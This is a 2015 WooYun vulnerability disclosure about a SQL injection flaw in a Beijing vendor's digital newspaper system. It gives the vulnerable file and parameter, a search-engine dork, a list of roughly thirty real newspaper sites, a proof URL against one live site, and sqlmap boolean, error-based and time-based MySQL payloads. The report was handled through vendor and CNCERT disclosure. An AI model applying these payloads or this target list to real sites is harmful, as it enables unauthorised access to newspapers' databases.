当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117722

漏洞标题:某数字报刊系统通用SQL注入漏洞,影响大量知名报社

相关厂商:北京紫新报通科技发展有限公司

漏洞作者: 路人甲

提交时间:2015-06-02 18:55

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-08: 细节向第三方安全合作伙伴开放
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

某数字报刊系统通用SQL注入漏洞,影响大量知名报社
大量案例附上!

详细说明:

某数字报刊系统通用SQL注入漏洞,影响大量知名报社
系统架构:JSP+MYSQL
漏洞文件:/epaper/search/result.jsp
注入参数:searchKeys
关键字:inurl:/epaper 北京紫新报通科技发展有限公司
中国医学论坛报:
http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm
增城日报:
http://zcrb.zcwin.com/epaper/
孝感日报:
http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm
定州日报:
http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html
中国会计报:
http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm
丹阳日报:
http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html
濮阳日报:
http://www.pyxww.cn:8080/epaper/paper.jsp?papername=%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html
永新周刊:
http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm
中华工商时报:
http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm
拉萨晚报:
http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm
今日龙泉:
http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm
淮业日报:
http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm
丽水广播电视:
http://xyz.lsol.com.cn/epaper/search/index.jsp
柳州日报:
http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm
松阳日报:
http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm
南宁日报:
http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm
同仁日报:
http://58.42.132.75:8080/epaper/trrb/html/
北海晚报:
http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm
粮油市场报:
http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm
无锡新周刊:
http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm
丹阳日报:
http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm
孝感日报:
http://szb.xgrb.cn:9999/epaper/
中国医学论坛报:
http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm
保山日报:
http://www.baoshandaily.com:8080/epaper/search/index.jsp
邵阳日报:
http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm
娄底日报:
http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm
生态新区:
http://61.153.66.148/epaper/search/index.jsp
中国经济导报:
http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm
庆元日报:
http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm
河南法制报:
http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm

漏洞证明:

漏洞验证:
柳州日报为例:
http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/01_50.htm
http://www.lznews.gov.cn:9999/epaper/search/result.jsp?papername=%C1%F8%D6%DD%C8%D5%B1%A8&searchKeys=aaa%27
单引号直接500了

11.png


Place: GET
Parameter: searchKeys
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: papername=%C1%F8%D6%DD%C8%D5%B1%A8&searchKeys=aaa%' AND 9005=9005 A
ND '%'='
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: papername=%C1%F8%D6%DD%C8%D5%B1%A8&searchKeys=aaa%' AND (SELECT 637
7 FROM(SELECT COUNT(*),CONCAT(0x3a7374623a,(SELECT (CASE WHEN (6377=6377) THEN 1
 ELSE 0 END)),0x3a7075693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_
SETS GROUP BY x)a) AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: papername=%C1%F8%D6%DD%C8%D5%B1%A8&searchKeys=aaa%' AND SLEEP(5) AN
D '%'='
---


11.png


当前数据库:

11.png


root用户权限:

11.png


等等
其他如上!

修复方案:

如上所述!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-06-05 18:11

厂商回复:

最新状态:

暂无